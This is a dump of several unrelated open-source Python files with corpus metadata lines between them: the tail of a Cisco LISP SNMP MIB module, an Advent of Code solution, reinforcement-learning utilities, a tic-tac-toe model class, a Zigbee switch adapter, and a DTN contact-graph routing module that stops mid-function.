0)) > (4, 4, 0): clispExtReliableTransportSessionGroup = clispExtReliableTransportSessionGroup.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionGroup.setDescription('A collection of objects to support reporting \\ ReliableTransportSession information.') clispExtGlobalStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 5)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEidRegMoreSpecificEntryCount")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtGlobalStatsGroup = clispExtGlobalStatsGroup.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispGlobalStatsTable') clispExtFeaturesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 6)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtFeaturesGroup = clispExtFeaturesGroup.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispFeaturesTable.') clispExtNotificationSupportGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 7)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtNotificationSupportGroup = clispExtNotificationSupportGroup.setStatus('current') if mibBuilder.loadTexts: clispExtNotificationSupportGroup.setDescription('A collection of objects to be supplied within notifications.') clispExtEidRegMoreSpecificValuesGroup = 
ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificCount")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): clispExtEidRegMoreSpecificValuesGroup = clispExtEidRegMoreSpecificValuesGroup.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegMoreSpecificValuesGroup.setDescription('A collection of objects to be supplied within notifications.') mibBuilder.exportSymbols("CISCO-LISP-EXT-MIB", clispExtReliableTransportSessionLocalPort=clispExtReliableTransportSessionLocalPort, clispExtReliableTransportSessionEntry=clispExtReliableTransportSessionEntry, clispExtNotificationObjects=clispExtNotificationObjects, clispExtFeaturesEntry=clispExtFeaturesEntry, clispExtFeaturesMapCacheLimitReached=clispExtFeaturesMapCacheLimitReached, clispExtMappingDatabaseEidRegFailure=clispExtMappingDatabaseEidRegFailure, clispExtGlobalStatsEntry=clispExtGlobalStatsEntry, clispExtEidRegRlocMembershipConfigured=clispExtEidRegRlocMembershipConfigured, clispExtEidRegRlocMembershipRloc=clispExtEidRegRlocMembershipRloc, clispExtGlobalStatsEidRegMoreSpecificEntryCount=clispExtGlobalStatsEidRegMoreSpecificEntryCount, clispExtGlobalStatsGroup=clispExtGlobalStatsGroup, clispExtFeaturesEidRegMoreSpecificWarningThreshold=clispExtFeaturesEidRegMoreSpecificWarningThreshold, clispExtNotificationSupportGroup=clispExtNotificationSupportGroup, clispExtUseProxyEtrStateChange=clispExtUseProxyEtrStateChange, clispExtUseMapResolverStateChange=clispExtUseMapResolverStateChange, clispExtRlocMembershipTable=clispExtRlocMembershipTable, ciscoLispExtMIBComplianceMapServer=ciscoLispExtMIBComplianceMapServer, ciscoLispExtConformance=ciscoLispExtConformance, ciscoLispExtMIB=ciscoLispExtMIB, clispExtRlocMembershipGroup=clispExtRlocMembershipGroup, clispExtEidRegRlocMembershipEidAfi=clispExtEidRegRlocMembershipEidAfi, 
clispExtReliableTransportSessionTable=clispExtReliableTransportSessionTable, clispExtFeaturesEidRegMoreSpecificWarningThresholdReached=clispExtFeaturesEidRegMoreSpecificWarningThresholdReached, clispExtReliableTransportSessionPeerAddressLength=clispExtReliableTransportSessionPeerAddressLength, clispExtEidRegMoreSpecificLimitReached=clispExtEidRegMoreSpecificLimitReached, clispExtFeaturesMapCacheWarningThresholdReached=clispExtFeaturesMapCacheWarningThresholdReached, clispExtRlocMembershipEidAfi=clispExtRlocMembershipEidAfi, clispExtEidRegMoreSpecificCount=clispExtEidRegMoreSpecificCount, clispExtEidRegMoreSpecificWarningThresholdReached=clispExtEidRegMoreSpecificWarningThresholdReached, clispExtRlocMembershipInstanceID=clispExtRlocMembershipInstanceID, clispExtEidRegMoreSpecificValuesGroup=clispExtEidRegMoreSpecificValuesGroup, clispExtReliableTransportSessionEstablishmentRole=clispExtReliableTransportSessionEstablishmentRole, clispExtRlocMembershipRlocLength=clispExtRlocMembershipRlocLength, clispExtReliableTransportSessionState=clispExtReliableTransportSessionState, clispExtFeaturesEidRegMoreSpecificLimit=clispExtFeaturesEidRegMoreSpecificLimit, clispExtEidRegRlocMembershipEntry=clispExtEidRegRlocMembershipEntry, clispExtRlocMembershipDiscovered=clispExtRlocMembershipDiscovered, clispExtEidRegFailure=clispExtEidRegFailure, clispExtReliableTransportSessionMessagesOut=clispExtReliableTransportSessionMessagesOut, clispExtRlocMembershipEntry=clispExtRlocMembershipEntry, ciscoLispExtCompliances=ciscoLispExtCompliances, clispExtReliableTransportSessionPeerPort=clispExtReliableTransportSessionPeerPort, clispExtEidRegRlocMembershipRlocLength=clispExtEidRegRlocMembershipRlocLength, ciscoLispExtNotifications=ciscoLispExtNotifications, clispExtRlocMembershipConfigured=clispExtRlocMembershipConfigured, clispExtFeaturesMapCacheWarningThreshold=clispExtFeaturesMapCacheWarningThreshold, clispExtNotificationsGroup=clispExtNotificationsGroup, 
clispExtUseMapServerStateChange=clispExtUseMapServerStateChange, clispExtEidRegMapRequestDropped=clispExtEidRegMapRequestDropped, clispExtReliableTransportStateChange=clispExtReliableTransportStateChange, clispExtGlobalObjects=clispExtGlobalObjects, clispExtReliableTransportSessionLocalAddressLength=clispExtReliableTransportSessionLocalAddressLength, clispExtEidRegRlocMembershipTable=clispExtEidRegRlocMembershipTable, clispExtEidRegMoreSpecificLimit=clispExtEidRegMoreSpecificLimit, clispExtEidRegSiteAllRegistrationsExpired=clispExtEidRegSiteAllRegistrationsExpired, clispExtEidRegRlocMembershipGroup=clispExtEidRegRlocMembershipGroup, clispExtReliableTransportSessionPeerAddress=clispExtReliableTransportSessionPeerAddress, clispExtFeaturesTable=clispExtFeaturesTable, clispExtFeaturesGroup=clispExtFeaturesGroup, ciscoLispExtGroups=ciscoLispExtGroups, clispExtEidRegMapRequestDroppedCause=clispExtEidRegMapRequestDroppedCause, clispExtEidRegFailureCause=clispExtEidRegFailureCause, clispExtReliableTransportSessionLastStateChangeTime=clispExtReliableTransportSessionLastStateChangeTime, clispExtEidRegRlocMembershipGleaned=clispExtEidRegRlocMembershipGleaned, clispExtEidRegRlocMembershipInstanceID=clispExtEidRegRlocMembershipInstanceID, clispExtRlocMembershipMemberSince=clispExtRlocMembershipMemberSince, clispExtReliableTransportSessionBytesOut=clispExtReliableTransportSessionBytesOut, ciscoLispExtObjects=ciscoLispExtObjects, clispExtReliableTransportSessionBytesIn=clispExtReliableTransportSessionBytesIn, PYSNMP_MODULE_ID=ciscoLispExtMIB, clispExtEidRegRlocMembershipMemberSince=clispExtEidRegRlocMembershipMemberSince, clispExtReliableTransportSessionGroup=clispExtReliableTransportSessionGroup, clispExtReliableTransportSessionLocalAddress=clispExtReliableTransportSessionLocalAddress, clispExtGlobalStatsTable=clispExtGlobalStatsTable, clispExtRlocMembershipRloc=clispExtRlocMembershipRloc, ciscoLispExtMIBComplianceAll=ciscoLispExtMIBComplianceAll, 
clispExtFeaturesEidRegMoreSpecificLimitReached=clispExtFeaturesEidRegMoreSpecificLimitReached, clispExtReliableTransportSessionMessagesIn=clispExtReliableTransportSessionMessagesIn, clispExtEidRegMoreSpecificWarningThreshold=clispExtEidRegMoreSpecificWarningThreshold)
175.05303
5,644
0.825378
4,494
46,214
8.487316
0.102804
0.043417
0.075979
0.032248
0.453726
0.350794
0.299198
0.280557
0.250066
0.21142
0
0.032393
0.075497
46,214
263
5,645
175.718631
0.860339
0.007141
0
0.043478
0
0.142292
0.360501
0.095826
0
0
0
0
0
1
0
false
0.007905
0.039526
0
0.039526
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bdbe3e3e964d3de239112acfd757c2553c93386b
678
py
Python
11.dumbo-octopus/py/part1.py
rolandbernard/adventofcode-2021
9249815af62d0fcf79b71357330a1456ea3be1ed
[ "BSD-2-Clause" ]
null
null
null
11.dumbo-octopus/py/part1.py
rolandbernard/adventofcode-2021
9249815af62d0fcf79b71357330a1456ea3be1ed
[ "BSD-2-Clause" ]
null
null
null
11.dumbo-octopus/py/part1.py
rolandbernard/adventofcode-2021
9249815af62d0fcf79b71357330a1456ea3be1ed
[ "BSD-2-Clause" ]
null
null
null
import sys

import numpy as np


def energize(grid, i, j):
    """Add one unit of energy to cell (i, j) of *grid*, in place.

    Out-of-range coordinates and cells that already flashed this step
    (value >= 10) are ignored.  When a cell reaches 10 it "flashes" and
    recursively energizes all eight neighbours; because a flashed cell is
    never incremented again within the step, each cell flashes at most once.

    Note: the parameter was renamed from ``map`` to ``grid`` to stop
    shadowing the builtin; the function is only ever called positionally.
    """
    if 0 <= i < grid.shape[0] and 0 <= j < grid.shape[1] and grid[i, j] < 10:
        grid[i, j] += 1
        if grid[i, j] >= 10:
            for di in range(-1, 2):
                for dj in range(-1, 2):
                    if di != 0 or dj != 0:
                        energize(grid, i + di, j + dj)


def simulate(grid, steps=100):
    """Run *steps* simulation steps on *grid* (mutated in place).

    Each step energizes every cell once (with cascading flashes), counts the
    cells that flashed (value >= 10), and resets them to 0.

    Returns:
        int: total number of flashes over all steps.
    """
    flashes = 0
    for _ in range(steps):
        for i in range(grid.shape[0]):
            for j in range(grid.shape[1]):
                energize(grid, i, j)
        flashes += int((grid >= 10).sum())
        grid[grid >= 10] = 0
    return flashes


def main():
    """Read the puzzle grid from stdin and print the 100-step flash count."""
    raw = sys.stdin.read()
    grid = np.array([[c for c in line] for line in raw.split('\n') if line],
                    dtype=int)
    print('Result:', simulate(grid, 100))


# Guard so importing this module (e.g. for testing) does not block on stdin.
if __name__ == '__main__':
    main()
26.076923
105
0.513274
130
678
2.669231
0.3
0.069164
0.072046
0.074928
0
0
0
0
0
0
0
0.057325
0.30531
678
25
106
27.12
0.679406
0
0
0
0
0
0.013314
0
0
0
0
0
0
1
0.055556
false
0
0.111111
0
0.166667
0.055556
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbe6b219cb1418af34e685a56c258fed902050b
10,853
py
Python
rlb/utils.py
jaekyeom/drop-bottleneck
85b64ce72ac22af56e167da2817c295b79a03eb7
[ "Apache-2.0", "MIT" ]
8
2021-03-16T05:37:41.000Z
2021-06-18T05:15:15.000Z
rlb/utils.py
jaekyeom/drop-bottleneck
85b64ce72ac22af56e167da2817c295b79a03eb7
[ "Apache-2.0", "MIT" ]
null
null
null
rlb/utils.py
jaekyeom/drop-bottleneck
85b64ce72ac22af56e167da2817c295b79a03eb7
[ "Apache-2.0", "MIT" ]
2
2021-06-23T08:15:16.000Z
2021-08-30T14:13:58.000Z
from __future__ import print_function from collections import OrderedDict, defaultdict import numpy as np import random import copy #from mpi_util import mpi_moments #def fc(x, scope, nh, *, init_scale=1.0, init_bias=0.0): # with tf.variable_scope(scope): # nin = x.get_shape()[1].value # w = tf.get_variable("w", [nin, nh], initializer=ortho_init(init_scale)) # b = tf.get_variable("b", [nh], initializer=tf.constant_initializer(init_bias)) # return tf.matmul(x, w)+b # #def conv(x, scope, *, nf, rf, stride, pad='VALID', init_scale=1.0, data_format='NHWC', one_dim_bias=False, bias_initializer=tf.constant_initializer(0.0)): # if data_format == 'NHWC': # channel_ax = 3 # strides = [1, stride, stride, 1] # bshape = [1, 1, 1, nf] # elif data_format == 'NCHW': # channel_ax = 1 # strides = [1, 1, stride, stride] # bshape = [1, nf, 1, 1] # else: # raise NotImplementedError # bias_var_shape = [nf] if one_dim_bias else [1, nf, 1, 1] # nin = x.get_shape()[channel_ax].value # wshape = [rf, rf, nin, nf] # with tf.variable_scope(scope): # w = tf.get_variable("w", wshape, initializer=ortho_init(init_scale)) # b = tf.get_variable("b", bias_var_shape, initializer=bias_initializer) # if not one_dim_bias and data_format == 'NHWC': # b = tf.reshape(b, bshape) # return b + tf.nn.conv2d(x, w, strides=strides, padding=pad, data_format=data_format) # # #def deconv(x, scope, *, nf, rf, stride, init_scale=1.0, data_format='NHWC'): # if data_format == 'NHWC': # channel_ax = 3 # strides = (stride, stride) # #strides = [1, stride, stride, 1] # elif data_format == 'NCHW': # channel_ax = 1 # strides = (stride, stride) # #strides = [1, 1, stride, stride] # else: # raise NotImplementedError # # with tf.variable_scope(scope): # out = tf.contrib.layers.conv2d_transpose(x, # num_outputs=nf, # kernel_size=rf, # stride=strides, # padding='VALID', # weights_initializer=ortho_init(init_scale), # biases_initializer=tf.constant_initializer(0.0), # activation_fn=None, # data_format=data_format) # return out # 
# #def ortho_init(scale=1.0): # def _ortho_init(shape, dtype, partition_info=None): # #lasagne ortho init for tf # shape = tuple(shape) # if len(shape) == 2: # flat_shape = shape # elif len(shape) == 4: # assumes NHWC # flat_shape = (np.prod(shape[:-1]), shape[-1]) # else: # raise NotImplementedError # a = np.random.normal(0.0, 1.0, flat_shape) # u, _, v = np.linalg.svd(a, full_matrices=False) # q = u if u.shape == flat_shape else v # pick the one with the correct shape # q = q.reshape(shape) # return (scale * q[:shape[0], :shape[1]]).astype(np.float32) # return _ortho_init def tile_images(array, n_cols=None, max_images=None, div=1): if max_images is not None: array = array[:max_images] if len(array.shape) == 4 and array.shape[3] == 1: array = array[:, :, :, 0] assert len(array.shape) in [3, 4], "wrong number of dimensions - shape {}".format(array.shape) if len(array.shape) == 4: assert array.shape[3] == 3, "wrong number of channels- shape {}".format(array.shape) if n_cols is None: n_cols = max(int(np.sqrt(array.shape[0])) // div * div, div) n_rows = int(np.ceil(float(array.shape[0]) / n_cols)) def cell(i, j): ind = i * n_cols + j return array[ind] if ind < array.shape[0] else np.zeros(array[0].shape) def row(i): return np.concatenate([cell(i, j) for j in range(n_cols)], axis=1) return np.concatenate([row(i) for i in range(n_rows)], axis=0) def set_global_seeds(i): try: import tensorflow as tf except ImportError: pass else: #from mpi4py import MPI tf.set_random_seed(i) np.random.seed(i) random.seed(i) #def explained_variance_non_mpi(ypred,y): # """ # Computes fraction of variance that ypred explains about y. 
#    Returns 1 - Var[y-ypred] / Var[y]
#
#    interpretation:
#        ev=0  =>  might as well have predicted zero
#        ev=1  =>  perfect prediction
#        ev<0  =>  worse than just predicting zero
#    """
#    assert y.ndim == 1 and ypred.ndim == 1
#    vary = np.var(y)
#    return np.nan if vary==0 else 1 - np.var(y-ypred)/vary
#
#def mpi_var(x):
#    return mpi_moments(x)[1]**2
#
#def explained_variance(ypred,y):
#    """
#    Computes fraction of variance that ypred explains about y.
#    Returns 1 - Var[y-ypred] / Var[y]
#    interpretation:
#        ev=0  =>  might as well have predicted zero
#        ev=1  =>  perfect prediction
#        ev<0  =>  worse than just predicting zero
#    """
#    assert y.ndim == 1 and ypred.ndim == 1
#    vary = mpi_var(y)
#    return np.nan if vary==0 else 1 - mpi_var(y-ypred)/vary


def add_noise(img, noise_p, noise_type):
    """Overwrite random 12x12 patches of randomly chosen images with noise.

    Each image in the batch is selected with probability *noise_p*; for the
    selected images, 10-39 randomly chosen 12x12 patches of the LAST channel
    get Gaussian noise added.  The patch grid is hard-coded for 84x84 frames
    (n = 84 // 12) — assumes 84x84 inputs; TODO confirm with callers.

    Args:
        img: image batch of shape (N, 84, 84, C).
        noise_p: per-image probability of receiving noise.
        noise_type: unused; kept for interface compatibility.

    Returns:
        The batch clipped to [0, 255] (a new array; the input is also
        mutated in place by the patch writes).
    """
    # np.bool was removed in NumPy 1.24; it was an alias for builtin bool.
    noise_mask = np.random.binomial(1, noise_p, size=img.shape[0]).astype(bool)
    w = 12
    n = 84 // 12
    idx_list = np.arange(n * n)
    random.shuffle(idx_list)
    idx_list = idx_list[:np.random.randint(10, 40)]
    for i in range(img.shape[0]):
        if not noise_mask[i]:
            continue
        for idx in idx_list:
            y = (idx // n) * w
            x = (idx % n) * w
            img[i, y:y+w, x:x+w, -1] += np.random.normal(0, 255*0.3, size=(w, w)).astype(np.uint8)
    img = np.clip(img, 0., 255.)
    return img


# Lazily-initialized default PIL font, shared across draw_text_to_image calls.
g_font = [None]


def draw_text_to_image(text, height=None, width=None, channels=None):
    """Render *text* into a uint8 numpy image with PIL's default font.

    Args:
        text: string to render (may be multi-line).
        height/width: output size; defaults to the measured text size.
        channels: number of channels; None produces a 2-D (grayscale) image.

    Returns:
        np.uint8 array of shape (height, width) or (height, width, channels).
    """
    from PIL import Image, ImageDraw, ImageFont
    if g_font[0] is None:
        g_font[0] = ImageFont.load_default()
    font = g_font[0]
    # ImageFont.ImageFont.getsize doesn't work for multi-line strings.
    # https://github.com/python-pillow/Pillow/issues/2966
    #text_size = font.getsize(text)
    dummy_img = Image.fromarray(np.zeros((1, 1), dtype=np.uint8))
    dummy_draw = ImageDraw.Draw(dummy_img)
    try:
        text_size = dummy_draw.textsize(text, font=font)
    except AttributeError:
        # ImageDraw.textsize was removed in Pillow 10; textbbox is the
        # documented replacement.
        bbox = dummy_draw.textbbox((0, 0), text, font=font)
        text_size = (bbox[2] - bbox[0], bbox[3] - bbox[1])
    if channels is None:
        shape = (height or text_size[1], width or text_size[0])
    else:
        shape = (height or text_size[1], width or text_size[0], channels)
    i = np.zeros(shape, dtype=np.uint8)
    img = Image.fromarray(i)
    draw = ImageDraw.Draw(img)
    # Bug fix: (255,) * None raised TypeError for grayscale output; use a
    # scalar fill when there is no channel axis.
    fill = 255 if channels is None else (255,) * channels
    draw.text((3, 0), text, font=font, fill=fill)
    return np.asarray(img)


def get_percentile_indices(data, percentiles=np.arange(0.0, 1.05, 0.1)):
    """Return indices into 1-D *data* of the elements at given percentiles.

    Args:
        data: 1-D array.
        percentiles: fractions in [0, 1] to look up.

    Returns:
        Array of indices into *data*, one per percentile.
    """
    assert len(data.shape) == 1
    data_asc = np.argsort(data)
    percentile_indices = (percentiles * (len(data_asc) - 1)).astype(int)
    percentile_indices = data_asc[percentile_indices]
    #assert np.all(data[percentile_indices[:-1]] <= data[percentile_indices[1:]])
    return percentile_indices


class CContext():
    """Lazy, memoized computation context with dependency invalidation.

    States are registered as callables; accessing ``ctx.name`` evaluates the
    state (once) and records which other states were being evaluated at the
    time, so invalidating a state also invalidates everything that read it.
    """

    def __init__(self, verbose=False, print_func=print):
        self._state_funcs = OrderedDict()        # name -> factory callable
        self._evaluated_states = OrderedDict()   # name -> cached value
        self._dependencies = defaultdict(set)    # name -> states depending on it
        self._eval_context = []                  # evaluation stack (for deps/cycles)
        self._verbose = verbose
        self._print_func = print_func

    def register_state(self, name, create):
        """Register factory *create* under *name*; duplicate names raise."""
        if name in self._state_funcs:
            raise Exception('State already registered: {}'.format(name))
        self._state_funcs[name] = create

    def invalidate_state(self, name):
        """Drop the cached value of *name* and, recursively, its dependents."""
        if name not in self._evaluated_states:
            return
        del self._evaluated_states[name]
        if self._verbose:
            self._print_func('Invalidated state "{}"'.format(name))
        for n in self._dependencies[name]:
            self.invalidate_state(n)
        del self._dependencies[name]

    def __getattr__(self, attr):
        # Only called for names not found normally, i.e. registered states.
        if attr not in self._state_funcs:
            raise Exception('Unknown state {}'.format(attr))
        if attr in self._eval_context:
            raise Exception('Circular dependency detected: {}, {}'.format(attr, self._eval_context))
        # Every state currently being evaluated depends on this one.
        self._dependencies[attr] = self._dependencies[attr].union(set(self._eval_context))
        if attr not in self._evaluated_states:
            self._eval_context.append(attr)
            evaluated_state = self._state_funcs[attr](self)
            if self._verbose:
                self._print_func('Evaluated state "{}"'.format(attr))
            self._eval_context.pop()
            self._evaluated_states[attr] = evaluated_state
        return self._evaluated_states[attr]


class EmptyClass():
    """Bare attribute container."""
    pass


# From https://github.com/openai/large-scale-curiosity/blob/0c3d179fd61ee46233199d0891c40fbe7964d3aa/cppo_agent.py#L226-L236
class RewardForwardFilter(object):
    """Discounted running sum of rewards: r_t + gamma * r_{t-1} + ..."""

    def __init__(self, gamma):
        self.rewems = None   # running discounted sum; None until first update
        self.gamma = gamma

    def update(self, rews):
        """Fold *rews* into the running sum and return it."""
        if self.rewems is None:
            self.rewems = rews
        else:
            self.rewems = self.rewems * self.gamma + rews
        return self.rewems


class RunningMeanStd(object):
    # https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
    """Streaming mean/variance over batches (Chan et al. parallel update)."""

    def __init__(self, epsilon=1e-4, shape=()):
        self.mean = np.zeros(shape, 'float64')
        self.var = np.ones(shape, 'float64')
        self.count = epsilon  # tiny pseudo-count avoids division by zero

    def update(self, x):
        """Fold a batch *x* (reduced over axis 0) into the running moments."""
        batch_mean = np.mean(x, axis=0)
        batch_var = np.var(x, axis=0)
        batch_count = x.shape[0]
        self.update_from_moments(batch_mean, batch_var, batch_count)

    def update_from_moments(self, batch_mean, batch_var, batch_count):
        """Fold precomputed batch moments into the running moments."""
        self.mean, self.var, self.count = update_mean_var_count_from_moments(
            self.mean, self.var, self.count, batch_mean, batch_var, batch_count)


class SimpleWeightedMovingScalarMeanStd():
    """Exponentially weighted scalar mean/variance estimate."""

    def __init__(self, alpha=0.0001):
        self._alpha = alpha  # weight of each new observation batch
        self.mean = 0.0
        self.var = 1.0

    def update(self, values):
        """Blend the mean/variance of *values* into the running estimates."""
        self.mean = (1 - self._alpha) * self.mean + self._alpha * np.mean(values)
        self.var = (1 - self._alpha) * self.var + self._alpha * np.mean(np.square(values - self.mean))


def update_mean_var_count_from_moments(mean, var, count, batch_mean, batch_var, batch_count):
    """Combine two sets of (mean, var, count) moments into one.

    Implements the parallel-variance merge; returns the combined
    (new_mean, new_var, new_count) tuple.
    """
    delta = batch_mean - mean
    tot_count = count + batch_count
    new_mean = mean + delta * batch_count / tot_count
    m_a = var * count
    m_b = batch_var * batch_count
    M2 = m_a + m_b + np.square(delta) * count * batch_count / tot_count
    new_var = M2 / tot_count
    new_count = tot_count
    return new_mean, new_var, new_count
36.789831
155
0.609417
1,501
10,853
4.223185
0.207195
0.017353
0.017984
0.014198
0.265184
0.189778
0.13693
0.118946
0.097492
0.097492
0
0.024378
0.262969
10,853
294
156
36.914966
0.768096
0.400719
0
0.04698
0
0
0.032415
0
0
0
0
0
0.020134
1
0.127517
false
0.013423
0.053691
0.006711
0.281879
0.033557
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbe72b5112056466b1083e545acb1c1e6dff2bb
901
py
Python
client/model.py
firmanmm/tic-tac-royale
83c3bb88cd31a34eeceeac3d42aaa302598f52e9
[ "MIT" ]
null
null
null
client/model.py
firmanmm/tic-tac-royale
83c3bb88cd31a34eeceeac3d42aaa302598f52e9
[ "MIT" ]
null
null
null
client/model.py
firmanmm/tic-tac-royale
83c3bb88cd31a34eeceeac3d42aaa302598f52e9
[ "MIT" ]
null
null
null
class Location:
    """A 2D board coordinate, usable as a dict/set key."""

    def __init__(self, x: int, y: int):
        self.x = x
        self.y = y

    def getX(self) -> int:
        return self.x

    def getY(self) -> int:
        return self.y

    def __eq__(self, value):
        # Robustness fix: comparing against a non-Location used to raise
        # AttributeError; returning NotImplemented lets Python fall back to
        # its default handling (e.g. `loc == None` is now simply False).
        if not isinstance(value, Location):
            return NotImplemented
        return self.x == value.x and self.y == value.y

    def __hash__(self):
        # Original string-based hash kept so hash values are unchanged.
        return hash("%d %d" % (self.x, self.y))


class Placement:
    """A pawn of a given type placed at a location within a room."""

    def __init__(self, code: int, pawnType: int, location: Location):
        self.code = code          # room code this placement belongs to
        self.pawnType = pawnType  # 0 = X, 1 = O, anything else = unknown
        self.location = location

    def getLocation(self) -> Location:
        return self.location

    def getPawnType(self) -> int:
        return self.pawnType

    def getPawnSymbol(self) -> str:
        """Return the board symbol for this pawn ("N" for unknown types)."""
        if self.pawnType == 0:
            return "X"
        elif self.pawnType == 1:
            return "O"
        return "N"

    def getRoomCode(self) -> int:
        return self.code
22.525
68
0.54717
113
901
4.221239
0.265487
0.125786
0.109015
0.142558
0
0
0
0
0
0
0
0.00335
0.337403
901
39
69
23.102564
0.795645
0
0
0
0
0
0.008889
0
0
0
0
0
0
1
0.344828
false
0
0
0.241379
0.758621
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
bdbebeb76abb18683215eb78cded4e0d06667190
191
py
Python
adapters/lumi/WXCJKG13LM.py
russdan/domoticz-zigbee2mqtt-plugin
d47895eab44bc87fc19ce151698d2afe9554fadc
[ "MIT" ]
146
2018-09-19T11:38:48.000Z
2022-03-21T11:54:12.000Z
adapters/lumi/WXCJKG13LM.py
russdan/domoticz-zigbee2mqtt-plugin
d47895eab44bc87fc19ce151698d2afe9554fadc
[ "MIT" ]
783
2018-09-28T17:07:14.000Z
2022-03-31T10:18:27.000Z
adapters/lumi/WXCJKG13LM.py
russdan/domoticz-zigbee2mqtt-plugin
d47895eab44bc87fc19ce151698d2afe9554fadc
[ "MIT" ]
147
2018-09-25T18:39:51.000Z
2022-03-01T19:31:27.000Z
from adapters.lumi.aqara_opple_switch import AqaraOppleSwitch class WXCJKG13LM(AqaraOppleSwitch): def __init__(self): buttons_count = 6 super().__init__(buttons_count)
21.222222
61
0.743455
21
191
6.190476
0.809524
0.184615
0
0
0
0
0
0
0
0
0
0.019231
0.183246
191
8
62
23.875
0.814103
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.6
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
bdc046b158b884fea2bcbaf2bb1204d34d3b4b00
4,565
py
Python
pydtnsim/routing/cgr_utils.py
ducktec/pydtnsim
916b0ebfa2b65b7a80af293dd4c39f862eadeae3
[ "MIT" ]
8
2018-12-11T17:39:44.000Z
2021-05-07T10:24:03.000Z
pydtnsim/routing/cgr_utils.py
Elianelin/pydtnsim
916b0ebfa2b65b7a80af293dd4c39f862eadeae3
[ "MIT" ]
13
2019-01-14T14:08:15.000Z
2021-06-12T17:03:43.000Z
pydtnsim/routing/cgr_utils.py
Elianelin/pydtnsim
916b0ebfa2b65b7a80af293dd4c39f862eadeae3
[ "MIT" ]
4
2019-03-20T15:12:40.000Z
2022-02-22T06:16:24.000Z
"""Module of commonly shared functions of various flavours of CGR.""" import math def cgr_neighbor_function(contact_graph, node, destination, current_distance, set_visited, suppressed_contacts, lookahead_time): """Neighbor function of CGR used by the Dijkstra algorithm. Used to determine feasible direct neigbors of a given node. Args: contact_graph (ContactGraph): The topology information in the form of a contact graph node (tuple): The evaluated node in the contact graph node form ``(from_node, to_node, from_time, to_time, data_rate)``. destination (tuple): The nominal destination node in the form ``(destination_id, destination_id, 0, math.inf, math.inf)`` current_distance (int): Contains the weight of the shortest path to the currently investigated node (in ms). set_visited (set): Set used for storing the visited flag of nodes during the Dijkstra runs. Also used for excluding suppressed (physical) nodes. suppressed_contacts (list): List of contacts that shall not be considered for forwarding (and thus neighbor selection) lookahead_time (int): Time value that specifies a time window (or rather a maximum time) only in which routes are searched. This reduces the time necessary to find a shortest route. Returns: list: A list of all feasible neighbors with items of the form ``(<node_id>, weight)`` with ``<node_id>`` representing a certain contact in the contact graph. """ neighbors = [] # Set the node as visited set_visited.add(node.from_node) # Extract the start time of the given node for edge in contact_graph.graph[node].successors: # Break the loop if the found edge to_time is smaller than the # current distance. As the successor list is sorted, all subsequent # edges will be smaller as well. 
if edge.to_time <= current_distance: break # Only consider when neigbor has not been visited by dijkstra yet # and it is not in the suppressed_contacts list # and can be reached given the currently consideret point in time # and if it is within the lookahead window (only when a lookahead # window is used) if ((lookahead_time is None or edge.from_time < lookahead_time) and edge.to_node not in set_visited and edge not in suppressed_contacts and (edge.to_time > current_distance)): # Only add to neighbors if no artificial end node or artificial end # node is bundle's destination if edge == destination or edge.from_node != edge.to_node: # Calculate the time (which is either positive or 0, relevant # for artificial terminal nodes) weight = edge.from_time - current_distance weight = max(weight, 0) # Append to neighbor list with weight neighbors.append((edge, weight)) return neighbors def cgr_get_route_characteristics(route, distance): """Calculate characteristics of a certain route. Args: route (list): A list of the nodes of the calculated route that's elements comprise of all relevant information for determining the characteristics' distance (int): The precalculated distance Returns: tuple: A tuple consisting of the (precalculated) distance, the capacity and the end time of the availability of that route """ capacity = math.inf distance = 0 # Iterate over all nodes in route and check if capacity is smaller than # already found minimum for node in route: distance = max(distance, node.from_time) # Generate capacity for node's 